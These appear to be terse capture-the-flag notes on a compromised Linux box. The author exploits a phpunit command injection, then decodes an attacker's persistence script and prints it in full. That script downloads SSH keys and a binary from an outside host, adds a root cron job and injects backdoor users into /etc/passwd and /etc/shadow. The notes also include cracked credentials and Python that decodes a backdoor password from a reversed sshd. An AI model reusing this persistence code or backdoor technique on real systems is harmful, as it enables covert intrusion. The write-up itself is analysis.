searching for phpunit exploit I got results.
making a command request to this url ->
gives us command injection
shell.
hackers have already hacked this system and placed a backdoor in it.
find / -user www-data 2>/dev/null | grep -v proc | grep -v /var/www/
got this file /var/backups/info
copying to my file and using strings on it.
got this hex decoded it with cyberchef
wget tempfiles.xyz/authorized_keys -O /root/.ssh/authorized_keys; wget tempfiles.xyz/.main -O /var/lib/.main; chmod 755 /var/lib/.main; echo "* 3 * * * root /var/lib/.main" >> /etc/crontab; awk -F":" '$7 == "/bin/bash" && $3 >= 1000 {system("echo "$1"1:\$6\$zS7ykHfFMg3aYht4\$1IUrhZanRuDZhf1oIdnoOvXoolKmlwbkegBXk.VtGg78eL7WBM6OrNtGbZxKBtPu8Ufm9hM0R/BLdACoQ0T9n/:18813:0:99999:7::: >> /etc/shadow")}' /etc/passwd; awk -F":" '$7 == "/bin/bash" && $3 >= 1000 {system("echo "$1" "$3" "$6" "$7" > users.txt")}' /etc/passwd; while read -r user group home shell _; do echo "$user"1":x:$group:$group:,,,:$home:$shell" >> /etc/passwd; done < users.txt; rm users.txt;
removed extra backslashes and gave it to hashcat
ihatehackers
there is another user named steven1
using ssh to login. even though there are two users they are both linked as they both have the same suid sgid
steven1 : ihatehackers
a mail for steven user.
something to do with apache.
doing incident response on the box.
for i in /etc/ ; do ls -la --time-style=full $i | grep -v '00000\|->';done
Nothing
find / -type f -printf "%T+ %pn\n" 2>/dev/null | grep -v '0000\| /proc\| /run\| /sys\| pyc\| /etc\| /boot\|python\| /var/log\| /var/lib'
nothing
maybe attacker edited the timestamp maybe the attacker only set it up to days and not upto seconds.
find / -type f -printf "%T+ %pn\n" 2>/dev/null | grep 00:00:00 | grep -v sys | grep -v proc | grep -v run
got result
attacker machine -> 
My machine
on my machine its just 1.3 mb but on victim its 3.5 so the attacker got its binary may be its a backdoor, and after that he edited the timestamp but forgot to do in minutes hours and seconds.
ghidra on it
inside symbol tree -> exports the function auth_password has variables named backdoor
there is an array of character they are joined together and then done a xor with 96 asked chatgpt to do it
#bVar7 = 0xd6
backdoor = [-0xc, -0x57, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]
#ctxt = {'pw': None, 'valid': None} # Replace this with the actual Authctxt structure
#ctxt['pw'] = [0x11, 0x22, 0x33] # Replace this with the actual pw value
#ctxt['valid'] = 1 # Replace this with the actual valid value
#ppVar1 = ctxt['pw']
#iVar9 = ctxt['valid']
backdoor[28] = -0xc
backdoor[29] = -0x57
backdoor[24] = -0x1d
backdoor[25] = -0x4b
backdoor[26] = -0x10
backdoor[27] = -0x44
backdoor[16] = -0x2a
backdoor[17] = -0x4d
backdoor[18] = -0x60
backdoor[19] = -3
backdoor[20] = -0x60
backdoor[21] = -0xc
backdoor[22] = -0x2a
backdoor[23] = -0x4e
backdoor[30] = -0x5b
backdoor[0] = -0x2a
backdoor[1] = -0x55
backdoor[2] = -0x19
backdoor[3] = -0x10
backdoor[4] = -0xd
backdoor[5] = -0x5d
backdoor[6] = -0x4d
backdoor[7] = -0x5c
backdoor[8] = -0x38
backdoor[9] = -3
backdoor[10] = -0x45
backdoor[11] = -9
backdoor[12] = -0x19
backdoor[13] = -0x2a
backdoor[14] = -0x4d
backdoor[15] = -3
# Convert negative values to corresponding positive byte values
backdoor_bytes = bytes((byte & 0xFF) for byte in backdoor)
result = bytearray()
for byte in backdoor_bytes:
result.append(byte ^ 0x96)
print(result)
output -> @=qfe5%2^k-aq@%k@%6k6b@$u#f*b?3
root : @=qfe5%2^k-aq@%k@%6k6b@$u#f*b?3
root